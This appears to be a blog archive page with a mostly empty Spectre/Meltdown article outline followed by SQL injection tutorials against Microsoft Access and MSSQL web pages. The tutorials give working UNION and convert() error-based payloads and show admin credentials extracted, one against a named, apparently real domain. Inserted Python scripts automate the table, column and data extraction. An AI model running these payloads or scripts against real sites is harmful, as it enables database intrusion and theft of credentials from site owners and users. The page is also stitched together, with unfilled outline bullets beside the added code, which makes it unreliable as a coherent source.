Showing posts with label injection.

26 September, 2023

Unveiling the Spectre and Meltdown Vulnerabilities (CVE-2017-5715, CVE-2017-5753, CVE-2017-5754)

Introduction:

In the realm of cybersecurity, few discoveries have sent shockwaves as profound as Spectre and Meltdown. These vulnerabilities, identified by their Common Vulnerabilities and Exposures (CVE) numbers - CVE-2017-5715, CVE-2017-5753, and CVE-2017-5754 - unearthed critical flaws at the heart of modern computing hardware. This article delves into the intricacies of these vulnerabilities, their potential consequences, and the far-reaching impact they've had on the technology landscape.

Section 1: What are Spectre and Meltdown? Spectre and Meltdown are a class of vulnerabilities that abuse speculative and out-of-order execution in modern microprocessors, affecting a wide range of CPUs from several manufacturers. Speculative execution is a performance feature that lets a processor execute instructions before it is certain they are needed; the architectural results of mispredicted work are discarded, but their side effects on the cache are not. CVE-2017-5753 (Spectre variant 1, bounds check bypass) and CVE-2017-5715 (Spectre variant 2, branch target injection) trick the branch predictor into speculatively executing code that reads memory it should never reach; CVE-2017-5754 (Meltdown, rogue data cache load) exploits the fact that the privilege check on a kernel-memory read is enforced only after the loaded value has already been forwarded to dependent instructions. In every case the data is recovered through a cache timing side channel, which allowed attackers to read memory they were not authorised to access, including passwords, encryption keys and other secrets.

Section 2: The Discovery and Disclosure

  • Describe the researchers and teams that uncovered Spectre and Meltdown.
  • Discuss the responsible disclosure process and the challenges in coordinating with hardware and software vendors.

Section 3: The Technical Details

  • Explain the technical intricacies of each vulnerability (CVE-2017-5715, CVE-2017-5753, CVE-2017-5754).
  • Describe how speculative execution works and how attackers exploited it to leak sensitive data.

Section 4: The Widespread Impact

  • Detail the wide range of CPUs affected by Spectre and Meltdown.
  • Discuss the potential consequences, including data breaches, identity theft, and corporate espionage.

Section 5: Mitigation and Countermeasures

  • Explain how hardware and software vendors responded to these vulnerabilities.
  • Discuss the challenges of patching hardware-level vulnerabilities and the performance implications of mitigations.

Section 6: Real-world Exploitation

  • Provide examples of real-world incidents or attacks that leveraged Spectre and Meltdown.
  • Discuss the evolving threat landscape and how attackers adapted to these vulnerabilities.

Section 7: Industry Response and Collaboration

  • Highlight the collaborative efforts among hardware manufacturers, software developers, and security researchers.
  • Discuss the long-term changes in CPU design and security practices.

Section 8: Lessons Learned

  • Analyze the lessons learned from Spectre and Meltdown.
  • Emphasize the importance of hardware security and the need for ongoing vulnerability assessment.

Section 9: The Future of Hardware Security

  • Discuss how Spectre and Meltdown have shaped the future of CPU and hardware security.
  • Mention ongoing research and developments in the field.

Conclusion: Spectre and Meltdown have forever altered the landscape of hardware security. These vulnerabilities, while alarming, have prompted the tech industry to reevaluate and strengthen its approach to security at the hardware level. As we continue to rely on increasingly powerful processors, the lessons learned from Spectre and Meltdown serve as a reminder that security must remain a top priority in the ever-evolving world of technology.

09 October, 2022

MS-Access Injection - Tutorial - Penetration Testing | Bug Bounty Program

In this tutorial you will learn how to inject into a Microsoft Access database (the Jet engine) behind a classic ASP page.

We will start injecting manually. First we have to check whether our target is vulnerable, so we use the usual test and add a single quote ' at the end of the parameter, then request the URL:

http://www.Vuln-Site.com/dettaglio-news.asp?ID=341'

Here we get the error:

ERROR:
Microsoft JET Database Engine error '80040e14'
Syntax error in string in query expression 'ID =341''.
/dettaglio-news.asp, line 91

The quote landed inside the SQL statement, so our target is vulnerable. Before starting anything else we have to balance the query. Jet SQL has no comment syntax, so the comment sequences used against MySQL or MSSQL do not work here:

http://www.Vuln-Site.com/dettaglio-news.asp?ID=341--+ Error!

ERROR: Syntax error (missing operator) in query expression 'ID =341--'.

http://www.Vuln-Site.com/dettaglio-news.asp?ID=341-- Again error!

Now let's check the null byte ;%00 :

http://www.Vuln-Site.com/dettaglio-news.asp?ID=341;%00 Error gone!

The null byte cuts off whatever the page appends after our input, so we continue injecting with ;%00 at the end of the parameter.

Now we have to count the total number of columns. For this we use the usual ORDER BY technique.

Let's check the total number of columns:

http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 order by 1;%00

No error. Page loaded normally!

http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 order by 5;%00

Again no error!

http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 order by 8;%00

Again the page loaded normally!

But at order by 9 we get the error:

http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 order by 9;%00

ERROR:
Microsoft JET Database Engine error '80040e14'
The Microsoft Jet database engine does not recognize '9' as a valid field name or expression.
/dettaglio-news.asp, line 91

So there are 8 columns.

Now let's prepare our UNION SELECT:

http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 Union Select 1,2,3,4,5,6,7,8;%00

After executing it we get an error:

ERROR:
Microsoft JET Database Engine error '80004005'
Query input must contain at least one table or query.
/dettaglio-news.asp, line 91

Here comes the main part. Our column count is correct; the error is Jet refusing a SELECT that has no FROM clause. It does not mean the database is MySQL: the message itself names the Jet engine behind Access. Access also has no information_schema to list tables from, so every UNION SELECT needs a FROM naming a real table, and we have to guess the table and column names.

Now we have to guess the tables and columns. First the tables.

http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 Union Select 1,2,3,4,5,6,7,8 from Login;%00

It gives us an error:

ERROR:
Microsoft JET Database Engine error '80040e37'
The Microsoft Jet database engine cannot find the input table or query 'login'. Make sure it exists and that its name is spelled correctly.
/dettaglio-news.asp, line 91

This means the table does not exist. Let's try another.

http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 Union Select 1,2,3,4,5,6,7,8 from tabladmin;%00

Still the same error!

But when we try the table admin the error is gone.

http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 Union Select 1,2,3,4,5,6,7,8 from admin;%00

With the table admin the error is gone and we can see the reflected columns on the web page.

You can see that 2, 3 and 6 are the reflected columns, so now we have to guess the column names. We put each guess into one of these reflected positions.

http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 Union Select 1,2,admin_id,4,5,6,7,8 from admin;%00

It gives us an error:

ERROR:
Microsoft JET Database Engine error '80040e10'
No value given for one or more required parameters.
/dettaglio-news.asp, line 91

This means the column does not exist: Jet treats an unknown column name as a query parameter that was never supplied. Let's try another.

http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 Union Select 1,2,login_id,4,5,6,7,8 from admin;%00

Still the same error!

When we put the column username the error is gone.

http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 Union Select 1,2,username,4,5,6,7,8 from admin;%00

So it gives us Username: 01775IO5

Now let's guess the column of the admin password. The column password also exists:

http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 Union Select 1,2,password,4,5,6,7,8 from admin;%00

It gives us Password="bEx0Th6

The same procedure applies to other Access-backed targets.
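The guessing loop above, written out as a small Python driver. This is an added example, not code from the original post: it classifies the Jet error codes the tutorial shows (80004005 needs a FROM, 80040e37 unknown table, 80040e10 unknown column) and uses them to run a wordlist of table and column names. The HTTP layer is a constructed mock of dettaglio-news.asp with an invented schema so the script runs offline; the wordlists are assumptions too. Replace mock_get with a real GET against a target you are authorised to test.

```python
"""Added example, not code from the original post: a Jet error classifier and a
table/column guessing loop for the Access injection above. mock_get is a
constructed stand-in for dettaglio-news.asp (schema invented); the wordlists
are assumptions."""
import re
from urllib.parse import quote, unquote

# Jet error codes from the tutorial and what each one tells the guessing loop.
JET_ERRORS = {
    "80040e14": "syntax",            # unbalanced quote / missing operator
    "80004005": "needs_from",        # "Query input must contain at least one table or query."
    "80040e37": "table_not_found",   # "cannot find the input table or query 'x'"
    "80040e10": "column_not_found",  # "No value given for one or more required parameters."
}
JET_RE = re.compile(r"Microsoft JET Database Engine error '([0-9a-fA-F]{8})'")

def classify(body):
    """Map a response body to a JET_ERRORS label, 'ok' (no Jet error) or 'other'."""
    m = JET_RE.search(body)
    return JET_ERRORS.get(m.group(1).lower(), "other") if m else "ok"

def build_url(base, param_value, injected_sql):
    """Jet has no comment syntax, so the rest of the query is cut off with a
    null byte instead of '--'. quote() runs first so %00 is not re-encoded."""
    value = quote(f"{param_value} {injected_sql}", safe=",()=")
    return f"{base}?ID={value};%00"

def union_select(ncols, table=None, column=None, position=3):
    cols = [str(i) for i in range(1, ncols + 1)]
    if column:
        cols[position - 1] = column          # guessed column goes into a reflected slot
    return "Union Select " + ",".join(cols) + (f" from {table}" if table else "")

def guess_table(get, base, value, ncols, wordlist):
    """First name in wordlist that Jet does not reject as an unknown table."""
    for name in wordlist:
        status = classify(get(build_url(base, value, union_select(ncols, table=name))))
        if status != "table_not_found":
            return name
    return None

def guess_columns(get, base, value, ncols, table, wordlist):
    """Names in wordlist that select cleanly from table (no 'required parameter' error)."""
    return [name for name in wordlist
            if classify(get(build_url(base, value, union_select(ncols, table, name)))) == "ok"]

# --- constructed mock of dettaglio-news.asp over an Access database (invented schema) ---
MOCK_SCHEMA = {"admin": {"id", "username", "password"}, "news": {"id", "title", "body"}}

def mock_get(url):
    def jet_error(code, text):
        return f"Microsoft JET Database Engine error '{code}'\n{text}\n/dettaglio-news.asp, line 91"
    raw = url.split("?ID=", 1)[1]
    if not raw.endswith(";%00"):          # without the null byte the page's trailing SQL breaks us
        return jet_error("80040e14", "Syntax error (missing operator) in query expression.")
    sql = unquote(raw[:-4])
    m = re.search(r"Union Select (.+?)(?: from (\w+))?$", sql, re.I)
    if not m:
        return "<html>news item</html>"
    cols, table = m.group(1).split(","), m.group(2)
    if table is None:
        return jet_error("80004005", "Query input must contain at least one table or query.")
    if table.lower() not in MOCK_SCHEMA:
        return jet_error("80040e37", f"The Microsoft Jet database engine cannot find the input table or query '{table}'.")
    if any(not c.isdigit() and c.lower() not in MOCK_SCHEMA[table.lower()] for c in cols):
        return jet_error("80040e10", "No value given for one or more required parameters.")
    return "<html>news item plus union row</html>"

if __name__ == "__main__":
    base = "http://www.Vuln-Site.com/dettaglio-news.asp"
    table = guess_table(mock_get, base, "341", 8, ["login", "tabladmin", "users", "admin"])
    print(table, guess_columns(mock_get, base, "341", 8, table, ["admin_id", "login_id", "username", "password"]))
```

The loop only ever reads the error code, not the page body, so it works even when the reflected columns are hard to spot; the one thing it cannot tell you is when a guessed table exists but the application filters the response, so check the final hit by eye.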

MSSQL Injection Using Convert - Penetration Testing - Bug Bounty Program

In our previous tutorial we discussed union based injection. Now let's come to the next part: in this tutorial you will learn about injecting a site with the convert technique. CONVERT casts a value from one data type to another; if we ask the server to convert a string such as a table name to int, the conversion fails and SQL Server puts the offending value into the error message. As long as the page shows database errors, the error text itself becomes our output channel, so this is error based injection and it works even when no column is reflected on the page.


So let's start our injection manually.

We have a target; let's check whether it is vulnerable. We execute the URL with a single quote " ' " added at the end of the target parameter:

http://www.Vuln-Site.com/authorprofile.asp?id=46'

It gives us an error:

ERROR:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark after the character string ''.
/authorprofile.asp, line 10

Our target site is vulnerable. As we are using the convert technique we do not need to count the number of columns or find a reflected one; we execute our queries directly inside convert() and read the results from the error messages.

Let's check the version:

http://www.Vuln-Site.com/authorprofile.asp?id=46 and 1=convert(int,@@version)--

After executing the query we get the version in the error message:

ERROR:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2012 - 11.0.5582.0 (X64) Feb 27 2015 18:10:15 Copyright (c) Microsoft Corporation Web Edition (64-bit) on Windows NT 6.1 <X64> (Build 7601: Service Pack 1) ' to data type int.
/authorprofile.asp, line 10

Version: Microsoft SQL Server 2012 - 11.0.5582.0 (X64) Feb 27 2015 18:10:15 Copyright (c) Microsoft Corporation Web Edition (64-bit) on Windows NT 6.1 <X64> (Build 7601: Service Pack 1)

Now let's check the current database name:

http://www.Vuln-Site.com/authorprofile.asp?id=46 and 1=convert(int,db_name())--

And we have the current database name:

ERROR:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Conversion failed when converting the nvarchar value 'museindia' to data type int.
/authorprofile.asp, line 10

Current database name: museindia

Now that we have the version and the database name, let's move on to getting the tables.

This is our query for getting the first table name:

http://www.Vuln-Site.com/authorprofile.asp?id=46 and 1=convert(int,(select top 1 table_name from information_schema.tables))--+

After executing the query we get the first table name:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Conversion failed when converting the nvarchar value 'about' to data type int.
/authorprofile.asp, line 10

Table name: about

To get the other tables we exclude every table name we have already seen, each one in single quotes inside the parentheses of a not in (...) list:

and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('OUR_PREVIOUS_TABLE_NAME_1','OUR_PREVIOUS_TABLE_NAME_2')))--+

So let's check the next table:

http://www.Vuln-Site.com/authorprofile.asp?id=46 and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('about')))--+

And we have the next table name:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Conversion failed when converting the nvarchar value 'aucon' to data type int.
/authorprofile.asp, line 10

Next table name: aucon

We keep going this way, adding each new name to the not in list, until we reach the table we want. Here we got the table name: members

Now let's get the column names from this table:

http://www.Vuln-Site.com/authorprofile.asp?id=46 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='members'))--+

This is the first column name: memberid

We get the other columns the same way we got the other tables:

http://www.Vuln-Site.com/authorprofile.asp?id=46 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='members' and column_name not in ('memberid')))--+

After getting the column names the final part is extracting data from the columns. This is our final query:

http://www.Vuln-Site.com/authorprofile.asp?id=46 and 1=convert(int,(select top 1 OUR_COLUMN_NAME_HERE from OUR_TABLE_NAME_HERE))--+

The error message prints one value from the column; add the values you have already seen to a not in (...) list, exactly as for tables, to walk through the rest of the rows. Note that convert only fails, and therefore only leaks, when the value is not numeric: a value such as 123 converts cleanly and the page simply loads. Prefixing a non-digit character, as in convert(int,'~'+(...)), forces the error for every value.
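The convert() walk above as a script. This is an added example, not code from the original post: it builds the `top 1 ... not in (...)` subqueries, pulls the leaked value out of the "Conversion failed" message with a regex, and stops when the subquery runs dry (it then returns NULL, 1=NULL is false, and the page loads without an error). The HTTP layer is a constructed mock of authorprofile.asp with an invented schema and rows so it runs offline; for a real target replace mock_get with a GET that URL-encodes the payload, and only against a system you are authorised to test.

```python
"""Added example, not code from the original post: automate the convert()
error based extraction walked through above. mock_get is a constructed
stand-in for authorprofile.asp (schema and rows invented)."""
import re

CONV_RE = re.compile(
    r"Conversion failed when converting the n?varchar value '(.*?)' to data type int\.", re.S)

def leaked_value(body):
    """Return the value SQL Server echoed in the conversion error, or None."""
    m = CONV_RE.search(body)
    return m.group(1) if m else None

def sql_str(s):
    """Quote a T-SQL string literal, doubling embedded single quotes."""
    return "'" + s.replace("'", "''") + "'"

def convert_probe(subquery):
    # cast(... as nvarchar) makes numeric columns work too, and the '~' prefix keeps
    # the result non-numeric: a value like '123' would convert to int without error.
    return f" and 1=convert(int,'~'+cast(({subquery}) as nvarchar(4000)))--"

def enumerate_values(get, base, expr, source, where=None, limit=50):
    """Walk a result set one value at a time with `top 1 ... not in (seen)`.
    Once every value is excluded the subquery yields NULL; 1=NULL is false,
    so the page loads without an error and the loop stops."""
    seen = []
    for _ in range(limit):
        conds = [where] if where else []
        if seen:
            conds.append(f"{expr} not in ({','.join(sql_str(v) for v in seen)})")
        sub = f"select top 1 {expr} from {source}" + (f" where {' and '.join(conds)}" if conds else "")
        val = leaked_value(get(base + convert_probe(sub)))
        if val is None:
            break
        seen.append(val[1:])            # drop the '~' marker
    return seen

def dump_schema(get, base):
    """Tables of the current database with their columns, via information_schema."""
    return {t: enumerate_values(get, base, "column_name", "information_schema.columns",
                                f"table_name={sql_str(t)}")
            for t in enumerate_values(get, base, "table_name", "information_schema.tables")}

# --- constructed mock of the vulnerable page and a tiny invented database ---
MOCK_DB = {
    "information_schema.tables": [{"table_name": t} for t in ("about", "aucon", "members")],
    "information_schema.columns": [{"table_name": "members", "column_name": c}
                                   for c in ("memberid", "username", "password")],
    "members": [{"memberid": "1", "username": "editor", "password": "s3cret"}],
}
STR_RE = re.compile(r"'((?:[^']|'')*)'")
PROBE_RE = re.compile(r"convert\(int,'~'\+cast\(\(select top 1 (\w+) from ([\w.]+)"
                      r"(?: where (.*))?\) as nvarchar\(4000\)\)\)--$")

def _row_matches(where, row):
    """Evaluate the only two condition shapes this script generates."""
    for cond in where.split(" and "):
        m = re.fullmatch(r"(\w+)=('(?:[^']|'')*')", cond)
        if m:
            if row[m.group(1)] != m.group(2)[1:-1].replace("''", "'"):
                return False
            continue
        m = re.fullmatch(r"(\w+) not in \((.+)\)", cond)
        if m and row[m.group(1)] in [s.replace("''", "'") for s in STR_RE.findall(m.group(2))]:
            return False
    return True

def mock_get(url):
    m = PROBE_RE.search(url)
    if not m:
        return "<html>author profile</html>"
    expr, source, where = m.groups()
    rows = [r for r in MOCK_DB[source] if not where or _row_matches(where, r)]
    if not rows:
        return "<html>author profile</html>"        # NULL result: no conversion, no error
    return ("Microsoft OLE DB Provider for ODBC Drivers error '80040e07'\n"
            "[Microsoft][ODBC SQL Server Driver][SQL Server]Conversion failed when converting "
            f"the nvarchar value '~{rows[0][expr]}' to data type int.\n/authorprofile.asp, line 10")

if __name__ == "__main__":
    base = "http://www.Vuln-Site.com/authorprofile.asp?id=46"
    print(dump_schema(mock_get, base))
    print(enumerate_values(mock_get, base, "username", "members"))
```

Two things the tutorial glosses over are handled here: values are quoted with sql_str so a name containing a single quote does not break the not in list, and the cast/prefix trick means an int column such as memberid leaks just as a varchar one does.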

24 March, 2022

MSSQL Union Based Injection Part-2 - Advanced Method





In this tutorial you will learn an advanced method that helps when the usual approach gets stuck.

On normal sites we count the columns with ORDER BY and then build the UNION SELECT to find the reflected columns, but in some cases the UNION step fails. For this tutorial I found a site to practise on.

First we check for the vulnerability, so as usual we add a single quote ' at the end of the parameter.

After executing the URL it gives us an error!

As our target is vulnerable, let's start injecting manually. First let's check how many columns there are, using ORDER BY to count the columns.

http://www.genuinecomputers.in/products.asp?pro=PenDrives order by 1--+
No error!

http://www.genuinecomputers.in/products.asp?pro=PenDrives order by 100--+
Again no error!

http://www.genuinecomputers.in/products.asp?pro=PenDrives order by 1000--+
Still no error!

An ORDER BY that never fails, even at 1000, means our payload is not reaching the parser as SQL: the parameter is a string, so everything we add stays inside the quotes. So let's try string based injection and add a single quote after the parameter. If you look at the error response, the query closes the string with a bracket ")" as well, so we add the quote and the closing bracket ")" after the parameter:

http://www.genuinecomputers.in/products.asp?pro=PenDrives') order by 1--+
No error! Site loaded normally.

http://www.genuinecomputers.in/products.asp?pro=PenDrives') order by 6--+
Again no error!

http://www.genuinecomputers.in/products.asp?pro=PenDrives') order by 7--+
Here we get an error!




ERROR:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 7 is
out of range of the number of items in the select list.
/products.asp, line 131

So there are 6 columns in total. Now let's prepare our UNION SELECT to find the reflected columns.

http://www.genuinecomputers.in/products.asp?pro=PenDrives') union select 1,2,3,4,5,6--+

But here we get an error!

ERROR:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Conversion failed when converting the varchar value 'PenDrives' to data type int.
/products.asp, line 131

Our column count is correct; the problem is the numeric placeholders. The columns of a UNION must have compatible types, and SQL Server resolves a varchar column against an int literal by converting the varchar side to int (int has the higher data type precedence). The original query's varchar value 'PenDrives' cannot be converted, so the whole query fails. NULL is compatible with every column type, so we use NULL placeholders instead of numbers, and we also make the original WHERE false with and 1=2:

http://www.genuinecomputers.in/products.asp?pro=PenDrives') and 1=2 union select null,null,null,null,null,null--+

Bingooo :p Error bypassed!

But now nothing is printed, so we cannot see which columns are reflected. We will check every column one by one: put @@version in the first slot, then put it back to null and move on to the next one.

http://www.genuinecomputers.in/products.asp?pro=PenDrive') union select @@version,null,null,null,null,null--+

Note that the parameter is now PenDrive, presumably a value that matches no row, so the original query returns nothing and only our UNION row is left (the same effect as and 1=2).

Here we get the version, but through an error rather than on the page: the first column is a smallint, so putting a string into it fails the conversion and the error message leaks the value.

Version:
Microsoft SQL Server 2012 (SP1) - 11.0.3000.0 (X64) Oct 19 2012 13:38:57 Copyright (c) Microsoft Corporation Web Edition (64-bit) on Windows NT 6.2 <X64> (Build 9200: )

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2012 (SP1) - 11.0.3000.0 (X64) Oct 19 2012 13:38:57 Copyright (c) Microsoft Corporation Web Edition (64-bit) on Windows NT 6.2 <X64> (Build 9200: ) ' to data type smallint.
/products.asp, line 131

Now let's check the tables in the current database:

http://www.genuinecomputers.in/products.asp?pro=PenDrive') union select table_name,null,null,null,null,null from information_Schema.tables--+

Here we get the first table name.

As this is the first table name, let's check the next one. To find the other tables we add this part to our query:
where table_name not in ('PREVIOUS_TABLE_1','PREVIOUS_TABLE_2')

http://www.genuinecomputers.in/products.asp?pro=PenDrive') union select table_name,null,null,null,null,null from information_Schema.tables where table_name not in ('products')--+

After getting the tables, next we check the columns. This is the query for getting the columns of a table:

http://www.genuinecomputers.in/products.asp?pro=PenDrive') union select column_name,null,null,null,null,null from information_Schema.columns where table_name='OUR_TABLE_NAME_HERE'--+

This gives the first column. To check the other columns we add a not in list, joined with and (a second where would be a syntax error):

http://www.genuinecomputers.in/products.asp?pro=PenDrive') union select column_name,null,null,null,null,null from information_Schema.columns where table_name='OUR_TABLE_NAME_HERE' and column_name not in ('PREVIOUS_COLUMN_1','PREVIOUS_COLUMN_2')--+

After getting the table and the columns, the final part is extracting data from the columns. This is the final query:

http://www.genuinecomputers.in/products.asp?pro=PenDrive') union select OUR_COLUMN_HERE,null,null,null,null,null from OUR_TABLE_HERE--+

Remember that the first slot is a smallint: a string value placed there comes back through the conversion error, as @@version did, while a value placed in a reflected varchar slot appears on the page.
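The Part-2 procedure above (and the basic union tutorial that follows) as a small Python driver. This is an added example, not code from the original post. It goes a little beyond the text: it tries the common ways of closing the original expression (nothing, ', ') and '))) until ORDER BY starts failing, which is how you tell "many columns" from "payload still inside a string literal", then probes each UNION slot with NULL placeholders and a marker string to classify the slot as rendered on the page, leaking through a conversion error, or silent. A constructed mock stands in for products.asp so it runs offline; the mock's column types, rendered columns and the ') context are assumptions. Use it only against targets you are authorised to test.

```python
"""Added example, not code from the original post: find the injection context,
count columns from the ORDER BY error, then classify each UNION slot.
mock_get is a constructed stand-in for products.asp (types and layout invented)."""
import re

ORDER_BY_RE = re.compile(r"The ORDER BY position number (\d+) is out of range")
CONV_RE = re.compile(
    r"Conversion failed when converting the \w+ value '(.*?)' to data type (\w+)\.", re.S)

def count_columns(get, url, prefix, max_cols=64):
    """First ORDER BY position that errors, minus one. None means ORDER BY never
    failed, i.e. the payload is probably still inside a string literal."""
    for n in range(1, max_cols + 1):
        if ORDER_BY_RE.search(get(f"{url}{prefix} order by {n}--")):
            return n - 1
    return None

def find_context(get, url, prefixes=("", "'", "')", "'))")):
    """Try common ways of closing the original expression; return (prefix, ncols)."""
    for prefix in prefixes:
        n = count_columns(get, url, prefix)
        if n:
            return prefix, n
    return None, None

def probe_slots(get, url, prefix, ncols, marker="zzqm"):
    """Place a unique string in one slot at a time (all others NULL, original rows
    removed with `and 1=2`) and classify each slot from the response."""
    results = {}
    for i in range(ncols):
        slots = ["null"] * ncols
        slots[i] = f"'{marker}{i}'"
        body = get(f"{url}{prefix} and 1=2 union select {','.join(slots)}--")
        m = CONV_RE.search(body)
        if m:
            results[i + 1] = ("error", m.group(2))   # numeric column: value leaks via the error
        elif f"{marker}{i}" in body:
            results[i + 1] = ("rendered", None)      # shown on the page: use it for output
        else:
            results[i + 1] = ("silent", None)
    return results

# --- constructed mock of products.asp: six columns, where (pro='...') ---
MOCK_TYPES = ["smallint", "varchar", "varchar", "int", "varchar", "varchar"]
MOCK_RENDERED = {2, 3, 5}
MOCK_ROW = ["1", "PenDrives", "9.99", "7", "PD-32", "yes"]   # the real first row, invented

def mock_get(url):
    value = url.split("?pro=", 1)[1]
    _, q, rest = value.partition("'")
    if not q:
        return "<html>product list</html>"            # payload stayed inside the literal
    if not rest.startswith(") "):
        return "[SQL Server]Unclosed quotation mark after the character string ''."
    injected = rest[2:].split("--", 1)[0].strip()
    m = re.fullmatch(r"order by (\d+)", injected)
    if m:
        n = int(m.group(1))
        if n > len(MOCK_TYPES):
            return (f"The ORDER BY position number {n} is out of range of the number "
                    "of items in the select list.")
        return "<html>product list</html>"
    m = re.fullmatch(r"(and 1=2 )?union select (.+)", injected)
    if not m:
        return "<html>product list</html>"
    left_rows_present, slots = m.group(1) is None, m.group(2).split(",")
    if len(slots) != len(MOCK_TYPES):
        return ("[SQL Server]All queries combined using a UNION, INTERSECT or EXCEPT operator "
                "must have an equal number of expressions in their target lists.")
    shown = []
    for i, (slot, typ) in enumerate(zip(slots, MOCK_TYPES)):
        numeric = typ in ("smallint", "int")
        if slot.isdigit() and not numeric and left_rows_present:
            # int literal has higher precedence: the real varchar row is converted and fails
            return f"Conversion failed when converting the varchar value '{MOCK_ROW[i]}' to data type int."
        if slot.startswith("'") and numeric:
            return f"Conversion failed when converting the varchar value '{slot.strip(chr(39))}' to data type {typ}."
        if slot != "null" and i + 1 in MOCK_RENDERED:
            shown.append(slot.strip("'"))
    return "<html>" + " ".join(shown) + "</html>"

if __name__ == "__main__":
    base = "http://www.genuinecomputers.in/products.asp?pro=PenDrives"
    prefix, ncols = find_context(mock_get, base)
    print(prefix, ncols, probe_slots(mock_get, base, prefix, ncols))
```

Against the mock, find_context reports the ') context with 6 columns, and the slot map says slots 2, 3 and 5 are rendered while 1 and 4 (smallint and int) still leak through the conversion error, which is exactly the situation the tutorial ran into with @@version in the first slot.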

10 March, 2022

MSSQL Union Based Injection



In the previous tutorial we covered injecting a MySQL database. Now let's come to injecting an MSSQL database.

In this tutorial we discuss MSSQL union based injection. MSSQL injection is similar to MySQL injection but not the same, and MySQL is generally the easier of the two.

So let's start injecting.

We have a target site. First we have to check whether it is vulnerable to MSSQL injection or not. For this purpose we add a single quote (') at the end of the parameter. Let us say our target site is the following, with the single quote added at the end to check for the vulnerability:

http://www.AnySite.com/news.asp?id=10'

After executing the request with the single quote it gives this type of error:

ERROR:

Microsoft OLE DB Provider for SQL Server error '80040e14'
Unclosed quotation mark after the character string ''.
/news.asp, line 9

So our target site is vulnerable to MSSQL injection.

Next we have to balance the query. Here are some comment sequences that we can try on our target site:

http://www.AnySite.com/news.asp?id=10-- Loading fine!

http://www.AnySite.com/news.asp?id=10--+ Loading fine!

http://www.AnySite.com/news.asp?id=10%23 Loading fine!

http://www.AnySite.com/news.asp?id=10; Loading fine!

In T-SQL the real comment sequence is -- (the + after it is just a URL-encoded space); # is not a comment in SQL Server, that is MySQL syntax, and whether variants like these "load fine" depends on how the page and any WAF in front of it treat the parameter, so try them and keep the one that works. After balancing the query the next step is to count the columns, using the ORDER BY technique as usual.

http://www.AnySite.com/news.asp?id=10 order by 1--+ Site Loaded Normally !

http://www.AnySite.com/news.asp?id=10 order by 5--+ Again Site Loaded Normally !

http://www.AnySite.com/news.asp?id=10 order by 15--+ Again Site Loaded Normally

and there is no any kind of error !

http://www.AnySite.com/news.asp?id=10 order by 16--+ Here we have Got Error !!



Error:

Microsoft OLE DB Provider for SQL Server error '80040e14'
The ORDER BY position number 16 is out of range of the number of items in the
select list.
/news.asp, line 9

So there are 15 columns in total. Now let's prepare our UNION SELECT. To find the reflected columns we make the original WHERE condition false (and 1=2) so that only the row from our UNION is returned:

http://www.AnySite.com/news.asp?id=10 and 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--+

After executing the UNION SELECT you can see the reflected columns printed on the web page.

In my case 5, 6, 7, 8 and 9 are the reflected columns.

So now let's check the version. To find the version we use @@version; we cannot use version() here as this is MSSQL, not MySQL.

Let's Give Command For Checking The Version:

http://www.AnySite.com/news.asp?id=10 and 1=2 UNION SELECT
1,2,3,4,@@version,6,7,8,9,10,11,12,13,14,15--+

After Executing the Query you can See the Version Printed on The Webpage:



Version:

Microsoft SQL Server 2008 R2 (RTM) - 10.50.1600.1 (X64) Apr 2 2010 15:48:46
Copyright (c) Microsoft Corporation Express Edition with Advanced Services (64-bit)
on Windows NT 6.2 (Build 9200:) (Hypervisor)

Now let's check the current database name. For this we put db_name() in the reflected column.

http://www.AnySite.com/news.asp?id=10 and 1=2 UNION SELECT 1,2,3,4,db_name(),6,7,8,9,10,11,12,13,14,15--+

After executing this you can see the database name printed there.

Database name:

bietdb

Here are some other functions and their uses:

FUNCTION      :  USE
@@version     :  server version string
db_name()     :  current database name
system_user   :  login name of the current session
user_name()   :  database user name of the current user
current_user  :  database user name (written without parentheses in T-SQL; current_user() is a syntax error)

The next part is getting the tables from the database. SQL Server has no group_concat (STRING_AGG only arrived in SQL Server 2017, and this target is 2008 R2), so we have to get the tables one by one. This is our query for the first table:

http://www.AnySite.com/news.asp?id=10 and 1=2 UNION SELECT 1,2,3,4,table_name,6,7,8,9,10,11,12,13,14,15 from information_schema.tables--+

And you can see the first table name printed there.

So admin is the first table name here. If you want the other tables, use this query:

http://www.AnySite.com/news.asp?id=10 and 1=2 UNION SELECT 1,2,3,4,table_name,6,7,8,9,10,11,12,13,14,15 from information_schema.tables where table_name not in ('admin')--+

In place of admin we put every table name we already have, to get the next one, and we continue until we reach the table we want. Remember that every table name must be inside the parentheses and enclosed in single quotes, as in this query:

where table_name not in ('Previous_Table_name_1','Previous_Table_name_2')

